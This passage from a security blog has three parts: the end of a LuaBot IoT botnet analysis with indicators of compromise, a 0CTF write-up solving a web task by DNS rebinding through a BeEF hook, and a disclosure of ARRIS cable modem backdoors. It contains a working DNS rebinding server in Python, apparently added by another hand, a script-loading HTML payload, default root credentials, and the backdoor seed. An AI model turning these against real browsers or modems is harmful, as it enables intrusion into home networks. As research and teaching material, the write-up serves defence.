src="https://4.bp.blogspot.com/-zW5f7S4q0iw/V9YnlT6kZvI/AAAAAAAABiA/VSYAiP90SSUR-3dD296qy-gw4S6F4ShgACLcB/s400/luabot_sucuri1.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-FA7xScQhqMo/V9YnozKsfkI/AAAAAAAABiI/2RhEkzM2gKkJ6ZhujWA6YGAKthg7ptwoQCLcB/s1600/luabot_sucuri2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://1.bp.blogspot.com/-FA7xScQhqMo/V9YnozKsfkI/AAAAAAAABiI/2RhEkzM2gKkJ6ZhujWA6YGAKthg7ptwoQCLcB/s400/luabot_sucuri2.PNG" width="297" /></a></div><br />LuaBot has its own Lua resolver function for DNS queries:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-_eYtyegeWd0/V9YwMb7lgZI/AAAAAAAABjE/EZV40yNa4ac8QpFMTxWskmua6KKfSToNgCLcB/s1600/luabot_dns.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="328" src="https://2.bp.blogspot.com/-_eYtyegeWd0/V9YwMb7lgZI/AAAAAAAABjE/EZV40yNa4ac8QpFMTxWskmua6KKfSToNgCLcB/s400/luabot_dns.PNG" width="400" /></a></div><br />Most of the bot capabilities are in line with the ones described on the&nbsp;<a href="http://blog.malwaremustdie.org/2016/09/mmd-0057-2016-new-elf-botnet-linuxluabot.html">Malware Must Die! blogpost</a>. It's interesting to note that the IPs from the CnC server and iptables rules don't overlap, probably because they're using different environments for different bot families (or they were simply updated).<br /><br />I did not analyse the remote botnet structure, but the modular approach and the interoperability of the malware indicate that there's a professional and ongoing effort.<br /><br /><b><br /></b><b>Conclusion</b><br /><b><br /></b></div><div>The analysed malware doesn't have any persistence mechanism to survive reboots. 
It wouldn't try to reflash the firmware or modify volatile partitions (NVRAM for example), but the first stage payload restricts remote access to the device using custom iptables rules.<br /><br />This is a quite interesting approach because they can quickly masscan the Internet, block external access to those IoT devices and selectively infect them using the final stage payloads.<br /><br />In 2015, when I initially reported about the ARRIS backdoors, there were over <a href="https://twitter.com/bernardomr/status/667643475358318592">600.000 vulnerable ARRIS devices exposed on the Internet</a>&nbsp;and 490.000 of them had telnet services enabled:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-6S4CIS6x8Tw/V9RZW6F-6TI/AAAAAAAABcc/x06OlEc1NGQ5O1I7bIIoUd-N4mrm2FGQgCLcB/s1600/arris-sep-2015-telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="407" src="https://3.bp.blogspot.com/-6S4CIS6x8Tw/V9RZW6F-6TI/AAAAAAAABcc/x06OlEc1NGQ5O1I7bIIoUd-N4mrm2FGQgCLcB/s640/arris-sep-2015-telnet.png" width="640" /></a></div>If we perform the same query nowadays (September/2016) we can see that the number of exposed devices was reduced to approximately 35.000:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-PZXChslVidQ/V9RXNG-E8xI/AAAAAAAABcM/YVsWE6a5ET0I-v8BAFAZTpwqRBhIvjD5wCLcB/s1600/arris-sep2016.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="442" src="https://3.bp.blogspot.com/-PZXChslVidQ/V9RXNG-E8xI/AAAAAAAABcM/YVsWE6a5ET0I-v8BAFAZTpwqRBhIvjD5wCLcB/s640/arris-sep2016.png" width="640" /></a></div>I know that the media coverage and the <a href="https://www.kb.cert.org/vuls/id/419568">security bulletins</a>&nbsp;contributed to that, but I wonder how many of those devices were infected and had external access restricted by some sort of malware...<br /><br /></div><div>The 
high number of Linux devices with Internet-facing administrative interfaces, the use of <a href="https://www.gnu.org/proprietary/proprietary-back-doors.html">proprietary Backdoors</a>, the lack of firmware updates and the ease to craft IoT exploits make them easy targets for online criminals.<br /><br /><div>IoT botnets are becoming a thing: manufacturers have to start building secure and reliable products, ISPs need to start shipping updated devices/firmwares and the final user has to keep his home devices patched/secured.</div><br />We need to find better ways to detect, block and contain this new trend. Approaches like the one from <a href="http://senr.io/">SENRIO</a>&nbsp;can help&nbsp;ISPs and Enterprises to have a better visibility of their IoT ecosystems. Large scale firmware analysis can also contribute and provide a better understanding of the security issues for those devices.<br /><br /><br /></div><div><b><span style="font-family: inherit;">Indicators of Compromise (IOCs)</span></b><br /><b><span style="font-family: inherit;"><br /></span></b><span style="font-family: inherit;">LuaBot ARMEB Binaries:</span></div><div><ul><li>drop (5deb17c660de9d449675ab32048756ed)</li><li>.nttpd (c867d00e4ed65a4ae91ee65ee00271c7)</li><li>.sox (4b8c0ec8b36c6bf679b3afcc6f54442a)</li><li>.sox.rslv (889100a188a42369fd93e7010f7c654b)</li><li>.arm_puma5 (061b03f8911c41ad18f417223840bce0)</li></ul><br />GCC Toolchains:<br /><ul><li>GCC: (Buildroot 2015.02-git-00879-g9ff11e0) 4.8.4</li><li>GCC: (GNU) 4.2.0 TI-Puma5 20100224</li></ul><br />Dropper and CnC IPs:<br /><ul><li>46.148.18.122</li><li>80.87.205.92</li></ul><div><br /></div>IP Ranges whitelisted by the Attacker:</div><div><ul><li>46.148.18.0/24</li><li>185.56.30.0/24</li><li>217.79.182.0/24</li><li>85.114.135.0/24</li><li>95.213.143.0/24</li><li>185.53.8.0/24</li></ul><div><br /></div></div></div>Bernardo 
Rodrigues<br /><br /><b>0CTF 2016 Write Up: Monkey (Web 4)</b> (2016-03-13)<br /><br />The Chinese <a href="https://ctf.0ops.sjtu.cn/">0CTF</a> took place on March 12-13 and it was yet another fun CTF. I played with my teammates from <a href="https://ctftime.org/team/10288">TheGoonies</a> and we were ranked #48.<br /><br />I found the Web task "Monkey" particularly interesting: I solved it with the help from my friend <a href="https://twitter.com/danilonc">@danilonc</a>, but it took way longer than it should have because of some **Spoiler Alert** DNS glitches. According to the scoreboard status, approximately 35 teams were able to solve it.<br /><br /><b>Task: Monkey (Web - 4pts)</b><br /><br /><div class="code">What is Same Origin Policy?<br /><br />you can test this problem on your local machine<br /><br />http://202.120.7.200</div><br />The running application receives a Proof-of-Work string and&nbsp;an arbitrary URL, instructing a "monkey" to scan the inputted URL for 2 minutes.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-8jR7_tVykpU/VuW3HqDcP9I/AAAAAAAABSs/tcF4PyKSD34sSemfUhbQr8NLd0xqF4kgQ/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B15.32.39.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="302" src="https://2.bp.blogspot.com/-8jR7_tVykpU/VuW3HqDcP9I/AAAAAAAABSs/tcF4PyKSD34sSemfUhbQr8NLd0xqF4kgQ/s320/Screen%2BShot%2B2016-03-13%2Bat%2B15.32.39.png" width="320" /></a></div><b>Proof-of-Work</b><br /><br />Solving the proof-of-work is pretty straightforward. We had to generate random strings and compare the first 6 chars from its MD5 versus the challenge. 
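A plain-Python version of that brute force, added here as an illustration (it is not the Go script this write-up links to): it enumerates candidate strings sequentially instead of sampling random ones, so no string is hashed twice, and returns the first whose MD5 hex digest starts with the challenge prefix, together with the check the server side effectively performs. The challenge value in the usage is constructed and shortened to 4 hex characters so the demo finishes quickly.

```python
import hashlib
import itertools
import string
import time

ALPHABET = string.ascii_letters + string.digits  # characters used to build candidates

def md5_prefix(s, n):
    """First n hex chars of MD5(s); this is exactly what the server compares."""
    return hashlib.md5(s.encode()).hexdigest()[:n]

def verify_pow(target_prefix, answer):
    """Server-side check: does MD5(answer) start with the challenge prefix?"""
    return isinstance(answer, str) and md5_prefix(answer, len(target_prefix)) == target_prefix

def expected_tries(prefix_len):
    """Average number of MD5 evaluations for a prefix of prefix_len hex chars: 16**n."""
    return 16 ** prefix_len

def solve_pow(target_prefix, alphabet=ALPHABET):
    """Enumerate candidates by increasing length until one verifies."""
    target_prefix = target_prefix.lower()
    if not all(c in "0123456789abcdef" for c in target_prefix):
        raise ValueError("challenge prefix must be hex")
    n = len(target_prefix)
    for length in itertools.count(1):
        for chars in itertools.product(alphabet, repeat=length):
            cand = "".join(chars)
            if md5_prefix(cand, n) == target_prefix:
                return cand

if __name__ == "__main__":
    # Constructed challenge: a 4-char prefix. The real task used 6, i.e. about
    # 16**6 = 16.8 million hashes on average, which is why a compiled solver pays off.
    challenge = md5_prefix("w00tsec", 4)
    t0 = time.time()
    answer = solve_pow(challenge)
    print(f"prefix {challenge} -> {answer!r} in {time.time() - t0:.2f}s, "
          f"valid={verify_pow(challenge, answer)}, expected tries for 6 chars: {expected_tries(6)}")
```

Each extra hex character multiplies the expected work by 16, which is the whole point of a proof-of-work gate: cheap for the server to verify, expensive enough for the client that mass abuse of the scanner becomes unattractive.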
The POW challenge was more CPU-intensive than normal, so the traditional bash/python one-liner ctf scripts would require some performance improvements.<br /><br /><a href="https://twitter.com/danilonc">@danilonc</a> had written a quick hack using Go to bruteforce and solve POW from older CTF challs, so we just slightly modified it:<br /><br /><script src="https://gist.github.com/bmaia/99052777c4046e974af0.js"></script> <br /><div class="separator" style="clear: both; text-align: left;">Solving the Proof-of-Work:</div><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-K0XXj5NiPK4/VuXFOsmTvoI/AAAAAAAABTY/E6nHMItMZ5MrIqn_wsOIvjG3e1HuzDcnA/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B16.26.49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://1.bp.blogspot.com/-K0XXj5NiPK4/VuXFOsmTvoI/AAAAAAAABTY/E6nHMItMZ5MrIqn_wsOIvjG3e1HuzDcnA/s400/Screen%2BShot%2B2016-03-13%2Bat%2B16.26.49.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: left;"><b>Same-Origin-Policy and CORS</b></div><b><br /></b>The Same-Origin-Policy (SOP) deems pages having the same URI scheme, hostname and port as residing at the same origin. If any of these three attributes varies, the resource is in a different origin. Hence, if provided resources come from the same hostname, scheme and port, they can interact without restriction.<br /><br />If you try to use an XMLHttpRequest to send a request to a different origin, you can’t read the response. However, the request will still arrive at its destination. 
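To make the origin comparison concrete, here is an added Python helper (not from the original write-up) that reduces a URL to the (scheme, host, port) tuple the SOP compares, treating an omitted port as the scheme's default, and then decides whether a script could read a cross-origin XHR response under a given set of CORS response headers. The URLs in the usage are the challenge's internal http://127.0.0.1:8080/secret and the example hook host mentioned later in this post; the header sets are constructed.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}

def origin_of(url):
    """Return the (scheme, host, port) tuple the Same-Origin Policy compares."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    host = (p.hostname or "").lower()
    port = p.port if p.port is not None else DEFAULT_PORTS.get(scheme)
    return (scheme, host, port)

def same_origin(url_a, url_b):
    """http://host/ and http://host:80/x are the same origin; https://host/ is not."""
    return origin_of(url_a) == origin_of(url_b)

def serialize_origin(url):
    """Origin as it appears in an Origin header or Access-Control-Allow-Origin value."""
    scheme, host, port = origin_of(url)
    if port == DEFAULT_PORTS.get(scheme):
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"

def response_readable(page_url, target_url, response_headers, with_credentials=False):
    """Can a script running on page_url read an XHR response from target_url?

    Same origin is always readable. Cross-origin, the response must carry
    Access-Control-Allow-Origin equal to '*' (only for requests without
    credentials) or exactly the requesting origin; with credentials the server
    must additionally send Access-Control-Allow-Credentials: true.
    The request is sent either way; only the read is blocked."""
    if same_origin(page_url, target_url):
        return True
    headers = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = headers.get("access-control-allow-origin")
    if acao is None:
        return False
    if acao == "*":
        return not with_credentials
    if acao == serialize_origin(page_url):
        if with_credentials:
            return headers.get("access-control-allow-credentials", "").lower() == "true"
        return True
    return False

if __name__ == "__main__":
    page = "http://www.example.com:8000/"          # where the attacker-controlled script runs
    secret = "http://127.0.0.1:8080/secret"        # the internal resource from the challenge
    print("no CORS header:", response_readable(page, secret, {}))
    print("ACAO *:", response_readable(page, secret, {"Access-Control-Allow-Origin": "*"}))
    print("ACAO exact origin:", response_readable(
        page, secret, {"Access-Control-Allow-Origin": "http://www.example.com:8000"}))
```

The two cases the write-up cares about fall out directly: with no CORS header the monkey's browser fetches /secret but the page never gets to read it, and with `Access-Control-Allow-Origin: *` the read would have been allowed.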
This policy prevents a malicious script on one page from obtaining access to sensitive data (both headers and body) on another web page in a different origin.<br /><br />For this particular CTF challenge, if the secret internal webpage had sent an insecure CORS header like "Access-Control-Allow-Origin: *", the browser would have let our script read the response and we would have retrieved the flag with no effort. This, of course, was not the case.<br /><div><br /></div><b><br /></b><b>Bypassing the Same-Origin Policy</b><br /><br />The flag was accessible on an internal webserver hosted at http://127.0.0.1:8080/secret. The first thing we did was hook the monkey's browser using <a href="https://github.com/beefproject/beef">BeEF</a>, so we could fingerprint its device, platform, plugins and components.<br /><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-le7BwVqBft0/VuXAJsuaVoI/AAAAAAAABTA/Z6X8QSakF_0lCgYkTBC1VBO63k36e2IkA/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B15.19.50.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://2.bp.blogspot.com/-le7BwVqBft0/VuXAJsuaVoI/AAAAAAAABTA/Z6X8QSakF_0lCgYkTBC1VBO63k36e2IkA/s400/Screen%2BShot%2B2016-03-13%2Bat%2B15.19.50.png" width="256" /></a></div><br />There was nothing interesting here: a custom user-agent and no known vulnerable component. We enumerated the characters accepted by the server with the following script:<br /><br /><script src="https://gist.github.com/bmaia/255d3f4210998ed19c3b.js"></script> Unfortunately, the server rejected special characters like spaces (%20 and +) and there was no sign of command injection.
Our evil plan to submit&nbsp;<b>--disable-web-security $URL</b> and have the monkey start Chrome with its SOP disabled didn't work, so we had to find other ways to retrieve the secret.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-gySVVcKBD_I/VuXRHKkOpPI/AAAAAAAABTs/BjYGrAdmrTY5E7Xq20rPz6Th2sza3ZVZA/s1600/Screen%2BShot%2B2016-03-13%2Bat%2B17.43.37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="212" src="https://1.bp.blogspot.com/-gySVVcKBD_I/VuXRHKkOpPI/AAAAAAAABTs/BjYGrAdmrTY5E7Xq20rPz6Th2sza3ZVZA/s640/Screen%2BShot%2B2016-03-13%2Bat%2B17.43.37.png" width="640" /></a></div><br />We also thought about using data: URIs and the file: scheme to load a malicious script/webpage, but a page loaded that way is still a different origin from 127.0.0.1:8080, so it wouldn't help us bypass the SOP. We tried to submit URLs like <b>&lt;html&gt;&lt;script/**/src='http://www.example.com:8000/hook.js'&gt;&lt;/script&gt;&lt;/html&gt;</b> and <b>file:///proc/self/environ</b> (setting custom request headers containing malicious HTML so that they would show up in the environment), but that is also known not to work on modern browsers.<br /><br /><br /><b>DNS Rebinding</b><br /><br />After some discussion, we concluded that we needed to perform a DNS rebinding attack. <a href="https://twitter.com/devttyS0">devttys0</a> presented <a href="https://www.defcon.org/images/defcon-18/dc-18-presentations/Heffner/DEFCON-18-Heffner-Routers.pdf">this class of vulnerabilities at DEFCON 18</a> and <a href="https://twitter.com/mikispag">@mikispag</a> recently wrote a detailed post describing how to use <a href="https://miki.it/blog/2015/4/20/the-power-of-dns-rebinding-stealing-wifi-passwords-with-a-website/">DNS rebinding to steal WiFi passwords</a>.<br /><br />DNS rebinding is a technique that can be used to breach same-origin restrictions, enabling a malicious website to interact with a different host.
The attack is possible because the SOP tells origins apart by scheme, hostname and port, whereas the actual delivery of HTTP requests depends on resolving that hostname to an IP address. If the attacker's name resolves to the attacker's server when the page loads and to 127.0.0.1 a moment later, the browser still treats both requests as same-origin and lets the script read the second response.<br /><br />We had some issues at first because we tried to use the free DNS service from DuckDNS and it was very glitchy. For some obscure reason, we were unable to hook the user's browser when using the service.<br /><br />To make our life harder, the challenge monkey would only browse the site for two minutes: we also couldn't use Namecheap's DNS service because its minimum TTL is 60 seconds.<br /><br /><b><br /></b><b>Attack Phase</b><br /><br />After deciding to set up our own DNS server, we came up with the following attack scenario:<br /><br />1) The user visits the BeEF hook page at http://ctf.example.com:8080 (IP 1.2.3.4). The port matches the internal server's port on purpose, since the origin must stay identical after the rebind.<br /><br />2) The webpage loads the BeEF JavaScript hook and the browser becomes a zombie.<br /><br />3) We perform a DNS rebind, changing the A record from 1.2.3.4 to 127.0.0.1.
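The rebinding step (3) above, as an added example that is not the BIND setup the team used: a minimal authoritative DNS responder in Python that answers A queries for one name with the attacker's IP until the configured number of lookups has been served, then with the rebind target, always with a 1-second TTL. The name and addresses (ctf.example.com, 1.2.3.4, 127.0.0.1) are the ones from the scenario; the "rebind after the first lookup" threshold is an assumption that stands in for the manual zone edit the team made once the hook fired. The `build_query` helper exists only to construct test input offline.

```python
"""Minimal DNS rebinding responder (added example; not the original BIND zone).

Answers A/IN queries for one name: the first `hits_before_rebind` answers
point at the attacker host, every later answer points at the rebind target.
TTL is 1 second so the victim's resolver asks again as soon as possible.
"""
import socket
import struct

FLAGS_RESPONSE_AA = 0x8400  # QR=1, AA=1
RCODE_NXDOMAIN = 3


def encode_qname(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_qname(msg: bytes, offset: int):
    """Return (name, offset just past the terminating zero). Compression
    pointers never appear in a question we build, so they are rejected."""
    labels = []
    while True:
        length = msg[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0:
            raise ValueError("compressed name in question section")
        labels.append(msg[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def build_query(name: str, txid: int = 0x1337) -> bytes:
    """Standard recursive A/IN query (constructed test input, not captured traffic)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set
    return header + encode_qname(name) + struct.pack("!HH", 1, 1)


class Rebinder:
    def __init__(self, name, first_ip, rebind_ip, hits_before_rebind=1, ttl=1):
        self.name = name.rstrip(".").lower()
        self.first_ip, self.rebind_ip = first_ip, rebind_ip
        self.hits_before_rebind, self.ttl = hits_before_rebind, ttl
        self.seen = 0

    def ip_for(self, qname: str):
        if qname.lower() != self.name:
            return None
        self.seen += 1
        return self.first_ip if self.seen <= self.hits_before_rebind else self.rebind_ip

    def respond(self, query: bytes) -> bytes:
        txid, flags, qdcount = struct.unpack("!HHH", query[:6])
        if qdcount != 1:
            raise ValueError("expected exactly one question")
        qname, off = decode_qname(query, 12)
        qtype, qclass = struct.unpack("!HH", query[off:off + 4])
        question = query[12:off + 4]
        rd = flags & 0x0100  # echo the client's RD bit
        ip = self.ip_for(qname) if (qtype, qclass) == (1, 1) else None
        if ip is None:
            hdr = struct.pack("!HHHHHH", txid, FLAGS_RESPONSE_AA | rd | RCODE_NXDOMAIN, 1, 0, 0, 0)
            return hdr + question
        # Answer RR: pointer to the question name at offset 12, TYPE A, CLASS IN, TTL, RDLENGTH, RDATA
        answer = struct.pack("!HHHIH", 0xC00C, 1, 1, self.ttl, 4) + socket.inet_aton(ip)
        hdr = struct.pack("!HHHHHH", txid, FLAGS_RESPONSE_AA | rd, 1, 1, 0, 0)
        return hdr + question + answer


def answered_ip(response: bytes):
    """A record carried by a Rebinder response, or None for NXDOMAIN."""
    ancount = struct.unpack("!H", response[6:8])[0]
    return socket.inet_ntoa(response[-4:]) if ancount else None


def answered_ttl(response: bytes) -> int:
    return struct.unpack("!I", response[-10:-6])[0]


def rcode(response: bytes) -> int:
    return struct.unpack("!H", response[2:4])[0] & 0xF


def serve(rebinder: Rebinder, bind_addr: str = "0.0.0.0", port: int = 53):
    """UDP loop; the name's NS records must delegate to this host for it to see queries."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((bind_addr, port))
    while True:
        data, peer = sock.recvfrom(512)
        try:
            sock.sendto(rebinder.respond(data), peer)
        except (ValueError, IndexError, struct.error):
            continue


if __name__ == "__main__":
    serve(Rebinder("ctf.example.com", "1.2.3.4", "127.0.0.1"))
```

The TTL only tells the resolver how long to cache; browsers keep their own DNS cache and may pin the first answer for longer than that, which is why the attack needs a page that keeps retrying (BeEF polling does this) and why it can take a couple of attempts within the two-minute window.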
<a href="https://twitter.com/danilonc">@danilonc</a> set up the BIND zone file with a low TTL (1 sec) and replaced the answer (lines 14-15) as soon as the browser got hooked.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-yPoNfQS0BI4/VuXtkIuDIbI/AAAAAAAABU0/rFUAhMG2o5M6aRt5gqIfaRfkaPCik7IGw/s1600/bind.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://2.bp.blogspot.com/-yPoNfQS0BI4/VuXtkIuDIbI/AAAAAAAABU0/rFUAhMG2o5M6aRt5gqIfaRfkaPCik7IGw/s400/bind.PNG" width="400" /></a></div><br />4) Perform a CORS request using BeEF's "Test CORS Request" module. By now ctf.example.com resolves to 127.0.0.1, so the request to http://ctf.example.com:8080/secret reaches the internal server, and because the page's origin is still ctf.example.com:8080 the browser hands the response body to our script.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-Ruvlj-AUCbg/VuXs2JjVq1I/AAAAAAAABUo/khrudtrkcGccRUUu4l81ca5RVgeHQCHUA/s1600/Screen%2BShot%2B2016-03-12%2Bat%2B18.24.15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://3.bp.blogspot.com/-Ruvlj-AUCbg/VuXs2JjVq1I/AAAAAAAABUo/khrudtrkcGccRUUu4l81ca5RVgeHQCHUA/s400/Screen%2BShot%2B2016-03-12%2Bat%2B18.24.15.png" width="400" /></a></div><br />Here's a small diagram of the attack:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-KOesqzu78qk/VuXsH1Nna2I/AAAAAAAABUc/lmOjBnyHtbMOGBFEJ3Gcz9sIFN8AwgevQ/s1600/rebinding.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="322" src="https://1.bp.blogspot.com/-KOesqzu78qk/VuXsH1Nna2I/AAAAAAAABUc/lmOjBnyHtbMOGBFEJ3Gcz9sIFN8AwgevQ/s640/rebinding.png" width="640" /></a></div><br /><br />After a couple of tries we finally managed to get the flag:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PQOzl7xuh5E/VuXsoq1sfyI/AAAAAAAABUg/uyQM5CljMG47HNTmdcWEMTL2soPMZUKVA/s1600/Screen%2BShot%2B2016-03-12%2Bat%2B18.46.56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="294" src="https://1.bp.blogspot.com/-PQOzl7xuh5E/VuXsoq1sfyI/AAAAAAAABUg/uyQM5CljMG47HNTmdcWEMTL2soPMZUKVA/s640/Screen%2BShot%2B2016-03-12%2Bat%2B18.46.56.png" width="640" /></a></div><br />Flag:&nbsp;<b>0ctf{monkey_likes_banananananananaaaa}</b><br /><br />Bernardo Rodrigues<br /><br /><b>ARRIS Cable Modem has a Backdoor in the Backdoor</b><br />Posted 2015-11-19, updated 2015-11-20<br /><br /><span style="font-family: inherit;">A couple of months ago, some friends invited me to give a talk at <a href="http://www.nullbyte-con.org/">NullByte Security Conference</a>. I started studying some <strike>embedded device</strike> junk hacking hot topics and decided to talk about cable modem security. <a href="https://twitter.com/drspringfield">Braden Thomas</a>&nbsp;keynoted at Infiltrate 2015 discussing <a href="https://bitbucket.org/drspringfield/cabletables/downloads/PracticalAttacksOnDOCSIS.pdf">Practical Attacks on DOCSIS</a>&nbsp;so, yeah, cable modem hacking is still mainstream.</span><br /><br />On November 21st I'll be in Salvador speaking on "Hacking cable modems: The Later Years". It's not a talk about theft of service and getting free Internet access. I'll focus on the security of the cable modems themselves, the technology used to manage them, how the data is protected and how the ISPs upgrade the firmware.
Spoiler Alert: everything's really, really bad.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DVOZdgrwcQM/VkqIoEZRIhI/AAAAAAAABPg/5rSv9XcPLbE/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="http://2.bp.blogspot.com/-DVOZdgrwcQM/VkqIoEZRIhI/AAAAAAAABPg/5rSv9XcPLbE/s320/Capturar.PNG" width="320" /></a></div><br />Securing cable modems is more difficult than securing other embedded devices because, in most cases, you can't choose your own device/firmware, and software updates are almost entirely controlled by your ISP.<br /><br />While researching the subject, I found a previously undisclosed backdoor on ARRIS cable modems, affecting many of their devices including the TG862A, TG862G and DG860A. As of this writing, Shodan searches indicate that the backdoor affects over 600,000 externally accessible hosts, and the vendor has not yet stated whether it's going to fix it.<br /><br /><b><br /></b><b>ARRIS Backdoors</b><br /><br />ARRIS SOHO-grade cable modems contain an undocumented library (libarris_password.so) that acts as a backdoor, allowing privileged logins using a custom password.<br /><br />The following files load the backdoor library on ARRIS TG862A firmware TS0705125D_031115_MODEL_862_GW (released in 2015):<br /><br /><div class="code">/usr/sbin/arris_init<br />/usr/sbin/dimclient<br />/usr/sbin/docsis_mac_manager<br />/usr/sbin/ggncs<br />/usr/sbin/gw_api<br />/usr/sbin/mini_cli<br />/usr/sbin/pacm_snmp_agent<br />/usr/sbin/snmp_agent_cm<br />/usr/www/cgi-bin/adv_pwd_cgi<br />/usr/www/cgi-bin/tech_support_cgi</div><br />The <a href="http://www.borfast.com/projects/arris-password-of-the-day-generator">ARRIS password of the day</a>&nbsp;is a remote backdoor known since 2009. It uses a DES-encoded seed (set by the ISP through the arrisCmDoc30AccessClientSeed MIB) to generate a daily backdoor password.
The default seed is MPSJKMDHAI and, guess what, many ISPs won't bother changing it at all.<br /><br />The backdoor account can be used to enable Telnet and SSH remotely via the hidden HTTP administrative interface "<a href="http://192.168.100.1/cgi-bin/tech_support_cgi">http://192.168.100.1/cgi-bin/tech_support_cgi</a>" or via custom SNMP MIBs.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MSNdFWF_mXI/VkqI4qNOEAI/AAAAAAAABPo/L7pKxxHvzEw/s1600/Screenshot-Touchstone%2BTechnical%2BSupport%2B-%2BMozilla%2BFirefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="http://2.bp.blogspot.com/-MSNdFWF_mXI/VkqI4qNOEAI/AAAAAAAABPo/L7pKxxHvzEw/s320/Screenshot-Touchstone%2BTechnical%2BSupport%2B-%2BMozilla%2BFirefox.png" width="320" /></a></div><br /><br />The default password for the SSH user 'root' is 'arris'. When you open the telnet session or authenticate over SSH, the system spawns the 'mini_cli' shell, which asks for the backdoor password.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-gzcCa0S4ZYU/Vk0t6WPZ_cI/AAAAAAAABRo/7tTuWIEZnxM/s1600/telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="319" src="http://4.bp.blogspot.com/-gzcCa0S4ZYU/Vk0t6WPZ_cI/AAAAAAAABRo/7tTuWIEZnxM/s320/telnet.png" width="320" /></a></div><br />When you log in using the password of the day, you are redirected to a restricted technician shell ('/usr/sbin/cli'):<br /><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody><tr><td style="text-align: center;"><a href="http://4.bp.blogspot.com/-NHsPa-1kh7o/Vk0gfzRpYUI/AAAAAAAABQw/uFU0GTYQLBw/s1600/restricted0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="460" src="http://4.bp.blogspot.com/-NHsPa-1kh7o/Vk0gfzRpYUI/AAAAAAAABQw/uFU0GTYQLBw/s640/restricted0.PNG" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">Restricted shells are ;restricted<br /><br /></td></tr></tbody></table>In order to understand how the backdoor works, I built a <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">Puma5 toolchain (ARMEB)</a> and cross-compiled some useful tools like strace, tcpdump and gdbserver. I hosted them on my GitHub, get them here:<br /><br />-&nbsp;<a href="https://github.com/bmaia/cross-utils/tree/master/armeb">https://github.com/bmaia/cross-utils/tree/master/armeb</a><br /><br />While analyzing the backdoor library and the restricted shells, I found some interesting code in the authentication check:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-iahipI2sMOo/Vk0nm7Vg3tI/AAAAAAAABRE/EA79sfWFJVQ/s1600/backdoors-final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="http://2.bp.blogspot.com/-iahipI2sMOo/Vk0nm7Vg3tI/AAAAAAAABRE/EA79sfWFJVQ/s640/backdoors-final.png" width="640" /></a></div><br /><br />Yes, they put a backdoor in the backdoor (<a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel from D-Link</a> is sure to be envious). The undocumented backdoor password is based on the last five digits of the modem's serial number. You get a full busybox shell when you log on to the Telnet/SSH session using these passwords.<br /><br />The vendor asked me not to disclose details about the password generation algorithm.
